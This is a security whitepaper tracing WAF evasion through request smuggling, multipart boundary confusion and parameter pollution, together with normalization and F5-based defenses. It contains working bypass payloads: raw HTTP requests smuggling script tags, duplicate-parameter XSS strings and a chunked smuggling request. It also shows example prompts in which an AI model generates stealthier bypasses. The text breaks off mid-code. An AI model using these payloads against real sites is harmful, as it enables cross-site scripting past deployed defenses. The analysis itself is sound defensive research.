Whitepaper

From Smuggling to Normalization: The Evolution of Parsing Discrepancy Attacks and the Future of Gen AI WAF Evasion

Abstract

Web Application Firewalls (WAFs) are widely deployed classification engines designed to filter malicious HTTP traffic, providing a scalable layer of automated threat management against common web vulnerabilities such as SQL injection and Cross-Site Scripting (XSS).

However, their efficacy is fundamentally constrained by their reliance on syntactic pattern matching and the assumption of consistent request parsing across the web stack.

Over the past two decades, attackers have systematically exploited parsing discrepancies between intermediaries — such as reverse proxies, WAFs, and backend application frameworks — to evade detection.

This paper traces the evolution of these attacks from the early 2000s, when Linhart et al. first documented HTTP Request Smuggling (HRS), to James Kettle’s 2020 revival of the technique, to the recent WAFFLED study, which reveals how content-level parsing inconsistencies in multipart/form-data, application/json, and application/xml enable stealthy bypasses.

We then examine Bruno Mendes’ autonomous pentest, which weaponizes HTTP Parameter Pollution (HPP) to bypass even strict WAFs. We demonstrate a clear lineage: from request smuggling, to semantic smuggling, to structure-aware evasion — each exploiting deeper layers of parsing divergence. Looking ahead, we argue that AI-augmented, grammar-driven fuzzing will accelerate the discovery of such discrepancies, making parsing fidelity a critical security property. In response, we reaffirm strict RFC compliance and request normalization — exemplified by tools like HTTP-Normalizer — as the only sustainable defense.

This work unifies decades of offensive security research under a single principle:

Differential parsing is a first-class attack surface.


1. Introduction

Web Application Firewalls (WAFs) have become ubiquitous in modern web infrastructure, acting as gatekeepers between clients and applications by filtering malicious traffic based on predefined rules. Despite their widespread adoption, WAFs are not immune to evasion. Traditional bypass techniques — such as payload obfuscation, encoding, or character insertion — have long been known and increasingly exploited [Pickles, 2025].

The real threat, however, has never been obfuscation — it has been differential parsing: the exploitation of inconsistencies in how different components in the request chain interpret HTTP syntax.

This attack surface is not new. As early as 2005, Linhart et al. documented HTTP Request Smuggling (HRS), demonstrating how discrepancies in Content-Length and Transfer-Encoding parsing could allow request smuggling past intermediaries [Linhart et al., 2005]. Just four years later, Stefano di Paola and Luca Carettoni introduced HTTP Parameter Pollution (HPP) at OWASP EU09, showing how duplicate parameters could be used to bypass input validation by exploiting inconsistent framework behavior [di Paola & Carettoni, 2009].

For years, these techniques remained niche — limited by the speed and creativity of human researchers. But in 2020, James Kettle reignited the field with his seminal work on HTTP Desync Attacks [Kettle, 2020]. Kettle did not invent HRS — but he reintroduced it, systematized it, and demonstrated its real-world impact against modern cloud architectures.

This paper traces that evolution:

  • 2005 – 2009: The discovery of parsing discrepancies (HRS, HPP)
  • 2020: Kettle’s revival and operationalization of HRS
  • 2024 – 2025: The human-scale peak (WAFFLED, Mendes)
  • 2025+: The AI explosion

We conclude by reaffirming HTTP-Normalizer as the only viable defense: enforce strict RFC compliance.


2. The Genesis: From Linhart to Kettle — The Reintroduction of HRS

While Linhart et al. (2005) first documented HTTP Request Smuggling, their work remained largely theoretical and underappreciated in the broader security community. For over a decade, HRS was treated as a curiosity - an edge case of HTTP parsing, not a practical attack vector.

That changed in 2020, when James Kettle published HTTP Desync Attacks: Smuggling Without the Smuggle [Kettle, 2020]. Kettle’s work was not a discovery - it was a reintroduction and weaponization of HRS for the modern web.

2.1 Kettle’s Contribution: Operationalizing HRS

Kettle’s key insight was that modern web stacks - cloud providers, CDNs, reverse proxies - had reintroduced the very parsing ambiguities that made HRS possible. He demonstrated this across:

  • Cloudflare
  • AWS
  • Azure
  • NGINX-based WAFs

His methodology was rigorous:

  • Black-box testing: No source code access.
  • Automated desync detection: Using timing and response anomalies.
  • Real-world impact: Session hijacking, cache poisoning, direct access to internal APIs.

Kettle didn’t just show that HRS was possible - he showed it was widespread, exploitable, and devastating.

2.2 The Legacy of Kettle’s Work

Kettle’s paper did more than expose vulnerabilities - it reframed WAF security. He showed that:

  • Parsing consistency is a first-class security property.
  • The WAF is not a firewall - it’s a parser, and if it parses differently than the backend, it fails.

This insight laid the foundation for all subsequent work on parsing discrepancies, including WAFFLED and HPP.

As Kettle himself noted:

“The problem isn’t that people are bad at parsing HTTP - it’s that they’re inconsistent.”


3. The Differential Parsing Spectrum: From Message Framing to Parameter Semantics

The history of WAF evasion is not a series of isolated tricks - it is the unfolding of a single vulnerability class: differential parsing. At its core, every successful WAF bypass exploits a semantic gap between how a WAF interprets an HTTP request and how the backend framework or interpreter processes it.

This paper unifies three generations of attacks under this principle:

  1. HTTP Request Smuggling (HRS): Exploits differences in message framing (e.g., Content-Length vs Transfer-Encoding).
  2. WAFFLED: Exploits differences in content structure (e.g., multipart/form-data boundaries, application/json field wrappers).
  3. HTTP Parameter Pollution (HPP): Exploits differences in parameter interpretation (e.g., ASP.NET’s comma concatenation of duplicate parameters).

Each attack shifts focus deeper into the request structure, but all rely on the same mechanism: the WAF sees a benign request; the backend sees a malicious one.
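The message-framing case can be made concrete with a minimal Python sketch. It assumes two deliberately simplified parsers, one that trusts only Content-Length and one that trusts only Transfer-Encoding: chunked, and feeds both the same bytes. The function names, the host victim.example, and the sample request are illustrative assumptions, not taken from any real proxy or server.

```python
from typing import Tuple


def frame_by_content_length(raw: bytes) -> Tuple[bytes, bytes]:
    """Return (body, leftover) for a parser that trusts Content-Length only."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    length = 0
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            length = int(value.strip())
    return rest[:length], rest[length:]


def frame_by_chunked(raw: bytes) -> Tuple[bytes, bytes]:
    """Return (body, leftover) for a parser that trusts chunked encoding only."""
    _, _, rest = raw.partition(b"\r\n\r\n")
    body = b""
    while True:
        size_line, _, rest = rest.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)  # ignore chunk extensions
        if size == 0:
            # Consume the CRLF that closes the (empty) trailer section.
            _, _, rest = rest.partition(b"\r\n")
            return body, rest
        body += rest[:size]
        rest = rest[size + 2:]  # drop the chunk data and its trailing CRLF


# Hypothetical request carrying both framing headers.
smuggled = b"GET /admin HTTP/1.1\r\nHost: victim.example\r\n\r\n"
body = b"0\r\n\r\n" + smuggled
raw = (
    b"POST / HTTP/1.1\r\n"
    b"Host: victim.example\r\n"
    b"Content-Length: " + str(len(body)).encode() + b"\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n" + body
)

cl_body, cl_leftover = frame_by_content_length(raw)
te_body, te_leftover = frame_by_chunked(raw)
```

The Content-Length parser consumes everything as the body of a single request and has nothing left over. The chunked parser stops at the zero-length chunk and is left holding the bytes of a second request. Whichever component sits in front inspects one message; the component behind it acts on two.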

3.1 A Unified Taxonomy of Parsing Discrepancies

| Layer | Attack Type | Parsing Discrepancy | Example | WAF Interpretation | Web Server Interpretation |
|---|---|---|---|---|---|
| Message Framing | HRS (Linhart/Kettle) | Content-Length vs Transfer-Encoding | Chunked smuggling | Sees one request with an opaque body | Sees two requests, the second one smuggled |
| Content Structure | WAFFLED | Boundary continuation (boundary*0=real-; boundary*1=boundary) | Multipart smuggling | Uses boundary=fake | Concatenates boundary*0 + boundary*1 → real-boundary |
| Parameter Semantics | HPP (Mendes) | Duplicate parameter handling | q=1'&q=alert(1)&q='2 | Scans each q in isolation | Concatenates → 1',alert(1),'2 → valid JS |
| Header Processing | HPACK Smuggling (Future) | HTTP/2 header compression | Compressed :path | Decodes to /admin | Decompresses to /etc/passwd |
| Cache Key Normalization | Cache Poisoning | Case sensitivity in query params | ?q=test vs ?Q=test | Treats as same key | Treats as different endpoints |

This table reveals a spectrum of parsing divergence, from syntactic framing to semantic execution. The attacker’s goal is always the same: to make the WAF parse less than the backend.

3.2 The Common Mechanism: Semantic Smuggling

All three attacks - HRS, WAFFLED, HPP - are forms of semantic smuggling:

  • The payload is not obfuscated.
  • The request is syntactically valid.
  • The attack succeeds only if the backend parses it correctly.

The evasion comes not from hiding the payload, but from structuring the request so that the WAF and backend disagree on what the payload is.

Example: HPP as Semantic Smuggling

In a recent pentest, Bruno Mendes [Mendes, 2025] demonstrated how HPP can bypass even strict WAF configurations on an ASP.NET application:

GET /search?q=1'&q=alert(1)&q='2 HTTP/1.1

  • WAF: Scans each q parameter in isolation. Sees alert(1) but misses context.
  • Backend (ASP.NET): Concatenates values: 1',alert(1),'2
  • Reflected in JavaScript:

userInput = '1',alert(1),'2';

  • → Valid, executable code via the comma operator.

Like WAFFLED, this is not obfuscation — it’s protocol-level smuggling, where the attack is assembled only at the application layer.
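The gap in this example can be reproduced with a short Python sketch. It assumes a toy signature (a quote that closes a string, followed by a separator and a function call) standing in for a real XSS rule, and a helper that joins duplicate values with commas the way the ASP.NET behavior above is described. XSS_RULE and both function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl

# Toy signature (an assumption, not a real WAF rule): a quote that closes
# a string, then a comma or semicolon, then the start of a function call.
XSS_RULE = re.compile(r"'\s*[,;]\s*\w+\(")


def waf_scans_each_value(query: str, name: str) -> bool:
    """True if any single value of `name` matches the rule on its own."""
    pairs = parse_qsl(query, keep_blank_values=True)
    return any(XSS_RULE.search(v) for k, v in pairs if k == name)


def aspnet_style_value(query: str, name: str) -> str:
    """Join every value of `name` with commas, as the backend is described to do."""
    pairs = parse_qsl(query, keep_blank_values=True)
    return ",".join(v for k, v in pairs if k == name)


query = "q=1'&q=alert(1)&q='2"
flagged_per_value = waf_scans_each_value(query, "q")
joined = aspnet_style_value(query, "q")
flagged_joined = XSS_RULE.search(joined) is not None
```

No individual fragment matches the rule, but the joined value does. The same rule gives two different verdicts depending only on which view of the parameter it is handed.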

Historical Note: While this paper focuses on a recently published variant, HTTP Parameter Pollution (HPP) was first introduced as an inspection evasion method by Stefano di Paola and Luca Carettoni at the OWASP EU09 conference in 2009 [di Paola & Carettoni, 2009]. Their work laid the foundation for understanding how inconsistent parameter handling could be exploited, a principle now weaponized in modern WAF bypasses.


4. The Next Wave: WAFFLED and Content Parsing Discrepancies

While HRS targeted message framing, WAFFLED [Jabiyev et al., 2024] shifts focus to content parsing - how WAFs and web frameworks interpret structured payloads like JSON, XML, and multipart forms.

4.1 Core Insight

WAFFLED observes that:

  • Reverse proxies and WAFs often use simplified or incomplete parsers for performance or compatibility.
  • Backend frameworks (e.g., Flask, Spring Boot) use full-featured, standards-compliant parsers.
  • This creates a semantic gap: the WAF may miss a malicious payload because it misparses the container, while the backend parses it correctly and executes the attack.

Crucially, the payload remains unmodified. The evasion comes not from obfuscation, but from manipulating the structure around it.

4.2 Methodology

WAFFLED uses a grammar-based fuzzer (T-Reqs) to generate syntactically valid but semantically tricky requests. It mutates:

  • multipart/form-data boundaries and headers
  • application/json field wrappers and quotes
  • application/xml DOCTYPE and schema constructs

It then tests whether:

  1. The WAF allows the request
  2. The backend successfully parses and executes the payload (e.g., XSS)
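
The two-part test above amounts to a differential oracle: a candidate counts as a bypass only when the WAF allows it and the backend still recovers the payload. The Python sketch below illustrates that oracle with stand-in parsers. It is not T-Reqs and not the study's harness; the duplicate-key JSON discrepancy is chosen only because it is easy to reproduce with the standard library, and all names are hypothetical.

```python
import json
from typing import Callable, List

PAYLOAD = "<script>alert(1)</script>"


def first_key_wins(pairs):
    """object_pairs_hook that keeps the first occurrence of a duplicate key."""
    out = {}
    for key, value in pairs:
        out.setdefault(key, value)
    return out


def waf_blocks(body: str) -> bool:
    """Stand-in WAF: keeps the first duplicate key, then looks for the payload."""
    parsed = json.loads(body, object_pairs_hook=first_key_wins)
    return any(PAYLOAD in str(v) for v in parsed.values())


def backend_values(body: str) -> List[str]:
    """Stand-in backend: plain json.loads, which keeps the last duplicate key."""
    return [str(v) for v in json.loads(body).values()]


def find_bypasses(
    candidates: List[str],
    blocks: Callable[[str], bool],
    extract: Callable[[str], List[str]],
) -> List[str]:
    """Keep candidates the WAF allows but whose payload the backend recovers."""
    return [
        c for c in candidates
        if not blocks(c) and any(PAYLOAD in v for v in extract(c))
    ]


candidates = [
    '{"comment": "hello"}',
    '{"comment": "<script>alert(1)</script>"}',
    '{"comment": "hello", "comment": "<script>alert(1)</script>"}',
]
bypasses = find_bypasses(candidates, waf_blocks, backend_values)
```

Only the third candidate survives both checks: the payload is unmodified, and the bypass exists purely because the two parsers resolve the duplicate key differently.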

4.3 Key Findings

  • 1,207 unique bypasses across 5 WAFs (Cloudflare, AWS, Azure, Google Cloud Armor, ModSecurity) and 7 frameworks
  • Multipart boundary confusion is especially effective (e.g., using boundary*0=real-;boundary*1=boundary to exploit RFC 2231 continuation)
  • Over 90% of real-world sites accept both application/x-www-form-urlencoded and multipart/form-data interchangeably, making multipart-based bypasses widely applicable

4.4 Example: Multipart Boundary Smuggling

POST / HTTP/1.1
Host: victim.com
Content-Type: multipart/form-data; boundary=fake;boundary*0=real-;boundary*1=boundary

--fake
Content-Disposition: form-data; name="field1"

value1
--fake--

--real-boundary
Content-Disposition: form-data; name="xss"

<script>alert(1)</script>
--real-boundary--

  • WAF sees boundary=fake, ignores the rest, and misses the XSS
  • Backend concatenates boundary*0 and boundary*1 → real-boundary, parses the xss part, and passes the payload to the application

This is not payload obfuscation - it’s parser confusion.
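
The disagreement over the boundary can be sketched in a few lines of Python. The sketch assumes two simplified Content-Type parsers: one that reads only the plain boundary parameter, and one that reassembles RFC 2231 continuation segments and prefers them when present. Whether a particular WAF or framework behaves like either function is an assumption; both functions are hypothetical.

```python
import re
from typing import Dict, Optional


def naive_boundary(content_type: str) -> Optional[str]:
    """Return the plain boundary= parameter, ignoring continuation segments."""
    for param in content_type.split(";")[1:]:
        name, _, value = param.strip().partition("=")
        if name.strip().lower() == "boundary":
            return value.strip().strip('"')
    return None


def continuation_aware_boundary(content_type: str) -> Optional[str]:
    """Join boundary*0, boundary*1, ... in index order when they are present."""
    segments: Dict[int, str] = {}
    for param in content_type.split(";")[1:]:
        name, _, value = param.strip().partition("=")
        match = re.fullmatch(r"boundary\*(\d+)", name.strip().lower())
        if match:
            segments[int(match.group(1))] = value.strip().strip('"')
    if segments:
        return "".join(segments[i] for i in sorted(segments))
    return naive_boundary(content_type)


header = "multipart/form-data; boundary=fake;boundary*0=real-;boundary*1=boundary"
seen_by_waf = naive_boundary(header)
seen_by_backend = continuation_aware_boundary(header)
```

With the header from the example, the first parser settles on fake and the second on real-boundary, so the two components split the same body into different parts.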


5. Not All WAFs Are Equal: Architecture as the Decisive Factor

The discovery of 1,207 bypasses in WAFFLED and the widespread failure on HPP suggest a universal WAF failure. But a closer look reveals a more nuanced truth: not all WAFs are equally vulnerable, and architecture determines resilience.

While many WAFs fail due to shallow, inline parsing, others resist these attacks by adopting a layered, protocol-aware parsing model.

5.1 The Shallow Parsing Problem: Reverse Proxy-WAF Parsing Gaps

The vulnerability often lies not in the WAF itself, but in the parsing behavior of the preceding reverse proxy or load balancer.

In most production architectures, the request chain is:

Client → [Reverse Proxy] → [WAF] → [Application]

The reverse proxy (e.g., NGINX, AWS ALB, Azure Application Gateway) terminates TLS, reassembles chunked requests, and normalizes headers and paths before forwarding the request to the WAF.

This creates a three-layer parsing chain, where:

  • The reverse proxy performs initial parsing
  • The WAF inherits the proxy’s interpretation
  • The backend may parse differently

If the proxy parses differently than the backend, the WAF inherits the gap - even if it parses correctly.

| Layer | Proxy Behaviour | WAF Consequence |
|---|---|---|
| Message Framing | Misreads Transfer-Encoding, fails to reassemble chunks | WAF sees a clean request; HRS bypass succeeds |
| Content Structure | Skips multipart/form-data parsing, treats body as opaque | WAF scans flat string; misses smuggled XSS |
| Parameter Semantics | Passes duplicate parameters unmodified | WAF sees fragments; backend concatenates (ASP.NET) → HPP bypass |

This explains why AWS WAF, Azure WAF, and NGINX App Protect — despite robust rule engines — are vulnerable to WAFFLED and HPP:

The proxy (ALB, Application Gateway, NGINX) does not normalize the request in a way that exposes the ambiguity to the WAF.

5.2 F5 Advanced WAF: Deep Parsing as Defense

F5’s Advanced WAF (AWAF) exemplifies a different architectural philosophy: deep, multi-layered, protocol-aware parsing.

Rather than a single inspection pass, AWAF uses the Traffic Management Microkernel (TMM) to:

  • Decouple normalization from inspection
  • Parse each protocol layer independently (HTTP, URI, headers, body)
  • Apply canonicalization before policy enforcement

This layered approach allows AWAF to understand the structure of the request - not just scan it - making it inherently more resilient to content-level parsing discrepancies like those exploited in WAFFLED.

Why F5 Resists WAFFLED-Style Bypasses

AWAF treats the HTTP request as a structured object, breaking it down into discrete, analyzable components:

  • URLs: Fully parsed and normalized, including path, query string, and fragments
  • Headers: Individually extracted and validated
  • Body Content: For multipart/form-data, the body is split into discrete parts, with each Content-Disposition, filename, and content-type validated independently
  • Nested Encodings: Pluggable decoders handle double URL-encoding, UTF-8 obfuscation, and other encodings before rule evaluation
  • Boundary Handling: Supports RFC 2231 continuation (boundary*0=real-;boundary*1=boundary) and correctly reconstructs the boundary for inspection

As a result, WAFFLED-style attacks — where the WAF misparses the boundary and misses the payload — are unlikely to succeed. AWAF sees the same boundary the backend does, and inspects the same payload.

“Canonicalization is not trivial — it’s a critical part of security logic.”

— Peter Scheffler, F5 [Scheffler, 2025]

Two Distinct Strategies for HPP: Security Policy vs. Semantic Emulation

When it comes to HTTP Parameter Pollution (HPP), F5’s architecture separates security enforcement from semantic emulation - a distinction that is both technically sound and operationally critical.

Strategy 1: Security Policy - Block or Isolate Duplicates (Recommended Default)

F5 AWAF allows administrators to enforce a strict security policy on duplicate parameters via the WAF policy configuration:

  • Go to Security > Application Security > Parameters
  • Set "Multiple Query Parameters" to "Reject" or "Use First/Last"

This is the recommended default for most applications, as it:

  • Closes the HPP attack vector at the gate
  • Prevents exploitation of backend-specific parsing quirks
  • Aligns with the principle of least privilege

As Peter Scheffler notes:

“If your WAF is making assumptions about how the app interprets paths — you’re flying blind.”

Blocking duplicate parameters is not a parsing decision — it’s a security decision. And in the absence of a known, required backend behavior, rejecting ambiguity is the only safe choice.
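
As a rough illustration of what such a policy does to a query string, the Python sketch below implements three modes: reject, first, and last. The mode names and the function are hypothetical and do not correspond to F5 configuration values; the point is only that every mode leaves a query with no duplicates for the backend to interpret.

```python
from typing import Dict
from urllib.parse import parse_qsl, urlencode


class DuplicateParameterError(ValueError):
    """Raised when the policy is "reject" and a parameter name repeats."""


def apply_duplicate_policy(query: str, policy: str = "reject") -> str:
    """Return a query string with at most one value per parameter name."""
    if policy not in ("reject", "first", "last"):
        raise ValueError(f"unknown policy: {policy}")
    resolved: Dict[str, str] = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in resolved:
            if policy == "reject":
                raise DuplicateParameterError(name)
            if policy == "first":
                continue  # keep the value already stored
        resolved[name] = value  # first sighting, or "last" overwriting
    return urlencode(resolved)
```

For q=a&q=b&x=1, the first mode yields q=a&x=1, the last mode yields q=b&x=1, and the reject mode raises before the request goes any further.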

Strategy 2: Semantic Emulation - Framework-Specific Parameter Combination (By Exception)

In cases where an application explicitly requires duplicate parameters (e.g., legacy ASP.NET apps), blocking is not an option. Here, F5’s architecture enables a second, advanced layer: semantic emulation via iRules.

Unlike the WAF policy — which operates on isolated parameters — an iRule can pre-process the request to mimic the backend’s parsing behavior before inspection.

This is not “parsing” — it’s emulation. And it’s where F5’s flexibility shines.

Example iRule: Simulate ASP.NET’s q=a&q=b → q=a,b (Comma Concatenation)

when HTTP_REQUEST {
    # Parameters the backend comma-concatenates (ASP.NET behavior)
    set target_params [list "q" "search" "input"]

    set pairs [split [HTTP::query] "&"]
    set emitted [list]
    set new_pairs [list]

    foreach pair $pairs {
        if { $pair eq "" } { continue }

        # Split name=value on the first "=" only
        set idx [string first "=" $pair]
        if { $idx == -1 } {
            set name $pair
        } else {
            set name [string range $pair 0 [expr {$idx - 1}]]
        }
        # URL decode the name for comparison
        set decoded_name [URI::decode $name]

        if { [lsearch -exact $target_params $decoded_name] == -1 } {
            # Pass through other params unchanged
            lappend new_pairs $pair
            continue
        }
        # Emit each target parameter once, at its first occurrence
        if { [lsearch -exact $emitted $decoded_name] != -1 } { continue }
        lappend emitted $decoded_name

        # Collect all values for this parameter, in order, still URL-encoded
        set all_values [list]
        foreach p $pairs {
            set i [string first "=" $p]
            if { $i == -1 } {
                set k $p
                set v ""
            } else {
                set k [string range $p 0 [expr {$i - 1}]]
                set v [string range $p [expr {$i + 1}] end]
            }
            if { $k ne "" && [URI::decode $k] eq $decoded_name } {
                lappend all_values $v
            }
        }
        # Concatenate with comma (ASP.NET behavior)
        set combined_value [join $all_values ","]
        lappend new_pairs "$name=$combined_value"
    }

    # Rewrite the URI only if the query string changed
    set new_query [join $new_pairs "&"]
    if { $new_query ne [HTTP::query] } {
        HTTP::uri "[HTTP::path]?$new_query"
        log local0. "HPP: Normalized query to '$new_query' (ASP.NET emulation)"
    }
}

How It Works:
  • Intercepts the request before the WAF policy is applied
  • For specified parameters (e.g., q), collects all values
  • Concatenates them with commas, mimicking HttpUtility.ParseQueryString()
  • Rewrites the query string so the WAF sees the same thing the backend will

This ensures that XSS rules inspect the final, concatenated value, not fragmented pieces.

Use Case:
  • Legacy ASP.NET applications that rely on comma-concatenated parameters
  • High-risk assets where HPP bypass is a known threat
  • Applications where blocking duplicates would break functionality

Note: This iRule should be applied only to specific applications, not globally.


5.3 The Limits of Any Classification Device

Even F5’s robust architecture cannot guarantee 100% immunity. Why?

  1. The Backend is a Moving Target: Frameworks evolve
  2. Custom Parsers Are Unpredictable: Many applications use custom or third-party parsers that deviate from RFCs
  3. AI-Driven Evasion Is Coming: As discussed in Section 6, GenAI-powered fuzzers could generate novel, RFC-adjacent mutations that exploit edge cases even in deep parsers.
  4. Performance vs. Security Trade-offs: Deep parsing is expensive. In high-throughput environments, WAFs may disable full body parsing — reintroducing the very gaps WAFFLED exploits.
  5. Semantic Emulation Is Not Built-In: While F5 supports policy enforcement and custom emulation via iRules, it does not automatically simulate backend-specific parameter handling (e.g., ASP.NET concatenation) out of the box. This must be explicitly configured.

Thus, while F5 AWAF represents a best-in-class defense, it remains a classification device — and all classifiers can be fooled by adversarial input.

But unlike many WAFs, F5 gives defenders the tools to close the gap:

  • Security policy to block ambiguity
  • iRules to emulate semantics
  • Deep parsing to normalize structure

As Peter Scheffler (F5) emphasizes:

“Canonicalization is not trivial — it’s a critical part of security logic.”

And in the age of AI-driven evasion, only a platform that supports both policy and emulation can hope to keep pace.


6. The Next Generation: AI-Augmented Semantic Parsers

The evolution of WAF evasion — from HRS to WAFFLED to HPP — reveals a consistent pattern: the attacker wins by exploiting a semantic gap between how the WAF thinks the request will be parsed and how the backend actually parses it.

Traditional defenses have responded with stricter syntax enforcement (e.g., HTTP-Normalizer) and deeper parsing layers (e.g., F5 AWAF). These are essential, but they are still reactive and static — they rely on known RFCs, fixed parser logic, and manual rule updates.

The next frontier is not just deep parsing, but intelligent parsing — a new class of AI-augmented semantic parsers that go beyond syntax to understand, predict, and emulate how a backend will interpret a request.

6.1 The Limitations of Rule-Based and RFC-Compliant Parsers

Even the most robust WAFs today operate within a closed-world assumption: they parse based on:

  • RFC specifications (e.g., ABNF for multipart/form-data)
  • Known framework behaviors (e.g., Flask vs. Spring Boot)
  • Predefined normalization rules

This works well for known discrepancies, but fails when:

  • A framework introduces a new parsing quirk
  • A custom parser is used (e.g., a proprietary XML handler)
  • An attacker combines multiple edge cases in novel ways (e.g., HPP + boundary confusion + encoding)

As Bruno Mendes’ hackbot demonstrated, heuristic-driven automation can bypass even ML-based WAFs in seconds by exploiting subtle parsing differences that static rules cannot anticipate.

Thus, the future of WAFs must move beyond pattern matching and syntax normalization to semantic reasoning.

6.2 Introducing the AI Semantic Parser

An AI-augmented semantic parser is not a replacement for RFC compliance, but a cognitive layer that enhances it. It combines:

  • Formal grammar parsing (ABNF, RFCs)
  • Machine learning models trained on parser behavior
  • Framework-specific emulation
  • Real-time feedback from backend responses

Its goal: to simulate not just what the backend will parse, but how and why.

Key Capabilities:

| Capability | Description |
|---|---|
| Framework Behavior Modeling | Trained on open-source parser code (e.g., HttpUtility.ParseQueryString in ASP.NET), API documentation, and real-world traffic to predict how duplicate parameters, boundary continuations, or JSON field wrappers will be handled. |
| Cross-Format Generalization | Learns analogies across content types (e.g., boundary confusion in multipart ↔ delimiter confusion in JSON ↔ entity termination in XML). |
| Differential Parsing Prediction | Given a request, predicts whether the WAF and backend will interpret it differently, flagging high-risk requests before they reach the application. |
| Adaptive Normalization | Instead of applying one-size-fits-all rules, it normalizes based on the target framework (e.g., if the backend is ASP.NET, it simulates comma concatenation of q parameters). |
| Autonomous Fuzzing & Defense Co-Training | Uses reinforcement learning to generate adversarial requests, then uses the results to improve its own parsing logic, creating a self-hardening system. |

6.3 GenAI as the Universal Fuzzer: Prompt Engineering as Offensive Security

The breakthrough is not the attack — it’s the automation.

Large Language Models (LLMs), trained on:

  • RFC specifications
  • Open-source parser code (Flask, Spring, ASP.NET)
  • Public bypass databases (PayloadsAllTheThings)
  • Real-world traffic patterns

…can now generate novel, RFC-adjacent bypasses with minimal prompting.

Prompt 1: Multipart Boundary Smuggling (WAFFLED++)

Prompt:

"Generate a multipart/form-data request that uses boundary*0 and boundary*1 continuation to define a real boundary that the WAF ignores but the backend concatenates. Use null bytes and linefeed removal to increase stealth. Target: Laravel backend, Cloudflare WAF."

AI Output:

POST /upload HTTP/1.1
Host: victim.com
Content-Type: multipart/form-data;
  boundary=fake\x00;boundary*0=real-;boundary*1=boundary

--fake
Content-Disposition: form-data; name="file"
innocent
--fake--

--real-boundary
Content-Disposition: form-data; name="xss"
<script>alert(1)</script>
--real-boundary--

Why it works:

  • WAF sees boundary=fake, ignores continuation
  • Laravel concatenates boundary*0 + boundary*1 → real-boundary
  • Null byte in header confuses WAF parsing

Prompt 2: HPP + JSON Obfuscation (HPP++)

Prompt:

"Create a JSON-based XSS bypass using HTTP Parameter Pollution. The backend is ASP.NET and reflects user input in a JavaScript context. Use duplicate data parameters to split the payload and avoid WAF detection. Include string concatenation and new Function() for obfuscation."

AI Output:

GET /api/search HTTP/1.1
Host: victim.com
Content-Type: application/json
{"data":"1'"}&{"data":"asd=window"}&{"data":"def='al'+'ert'"}&{"data":"asd[def](1)"}

When reflected:

userInput = '1',asd=window,def='al'+'ert',asd[def](1);

→ Executes alert(1).

Why it works:

  • Each fragment is benign
  • ASP.NET concatenates → valid JS
  • WAF sees no alert or document.cookie

Prompt 3: Cross-Layer Smuggling (HRS + HPP + WAFFLED)

Prompt:

"Design a hybrid attack that combines HTTP Request Smuggling, HTTP Parameter Pollution, and multipart boundary confusion. The goal is to smuggle a request that uses HPP to bypass a WAF and deliver an XSS via a multipart body with a crafted boundary. Target: AWS WAF with OWASP CRS 3.0, backend: Spring Boot."

AI Output (simplified):

POST / HTTP/1.1
Host: victim.com
Content-Length: 150
Transfer-Encoding: chunked


0


GET /search?q=1'&q=alert(1)&q='2 HTTP/1.1
Content-Type: multipart/form-data; boundary=fake;boundary*0=real-;boundary*1=boundary

--real-boundary
Content-Disposition: form-data; name="xss"
<script>alert(1)</script>
--real-boundary--

Why it works:

  • HRS smuggles the request past the WAF
  • HPP bypasses XSS rules
  • Multipart boundary confusion hides the payload

6.4 The Rise of the Hackbot

Bruno Mendes’ autonomous pentest engine demonstrated that AI-driven systems can bypass even "unbeatable" WAFs in seconds. His hackbot:

  • Bypassed Azure WAF with a simple payload: test\\';alert(1);//
  • Found a bypass for open-appsec in 30 seconds
  • Adapted when blocked, switching from alert(1) to confirm(1)

This is not hypothetical - it is the present.

And the prompt is the new exploit.


7. Other Shadows of Differential Parsing

The principle of differential parsing extends beyond HTTP/1.1. As web protocols evolve, so do the parsing attack surfaces.

7.1 HTTP/2 and HPACK Smuggling

HTTP/2 uses HPACK compression to reduce header size. A WAF that decompresses headers differently than the backend could allow smuggling.

7.2 gRPC and Protocol Buffer Parsing

gRPC uses Protocol Buffers, which encode fields by number rather than by name. A WAF that doesn’t decode protobufs may miss malicious fields.

7.3 GraphQL Query Parsing

GraphQL allows complex nested queries. A WAF that parses only the outer structure may miss malicious arguments embedded in deeply nested fields.

7.4 Cache Key Normalization

CDNs and reverse proxies often normalize cache keys (e.g., lowercase query params). If the WAF and CDN disagree, an attacker could poison the cache.
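
A minimal Python sketch of the cache-key case follows. It assumes a single hypothetical cache_key function with a switch for case folding of parameter names; which real component folds case, if any, is deployment-specific and is not claimed here.

```python
from urllib.parse import parse_qsl, urlencode


def cache_key(path: str, query: str, fold_case: bool) -> str:
    """Build a cache key, optionally lowercasing parameter names first."""
    pairs = parse_qsl(query, keep_blank_values=True)
    if fold_case:
        pairs = [(name.lower(), value) for name, value in pairs]
    return path + "?" + urlencode(sorted(pairs))


folding_a = cache_key("/search", "q=test", fold_case=True)
folding_b = cache_key("/search", "Q=test", fold_case=True)
strict_a = cache_key("/search", "q=test", fold_case=False)
strict_b = cache_key("/search", "Q=test", fold_case=False)
```

The folding component maps ?q=test and ?Q=test to the same key, while the strict component keeps them apart. A response generated for one spelling can therefore be served for the other whenever the two components sit on opposite sides of that choice.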


8. Toward a New Evaluation Metric: Parsing Fidelity

Given these realities, we propose Parsing Fidelity as the key metric for evaluating WAFs:

Parsing Fidelity = The degree to which a WAF’s parsing model matches the backend framework’s behavior.

A WAF with high parsing fidelity:

  • Uses the same parser libraries as the framework
  • Applies identical canonicalization rules
  • Validates before inspecting, not the other way around

This aligns with HTTP-Normalizer, but pushes it further: the WAF should not just normalize; it should emulate.
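
The definition above is qualitative. One possible way to put a number on it, offered here as an assumption rather than as part of the proposal, is the fraction of a request corpus on which the WAF's parse and the backend's parse agree. The Python sketch below computes that ratio for two toy parsers; every name in it is hypothetical.

```python
from typing import Callable, Hashable, Iterable
from urllib.parse import parse_qsl


def parsing_fidelity(
    corpus: Iterable[str],
    waf_parse: Callable[[str], Hashable],
    backend_parse: Callable[[str], Hashable],
) -> float:
    """Fraction of requests on which both parsers produce the same result."""
    requests = list(corpus)
    if not requests:
        raise ValueError("corpus must not be empty")
    agree = sum(1 for r in requests if waf_parse(r) == backend_parse(r))
    return agree / len(requests)


def q_values(query: str):
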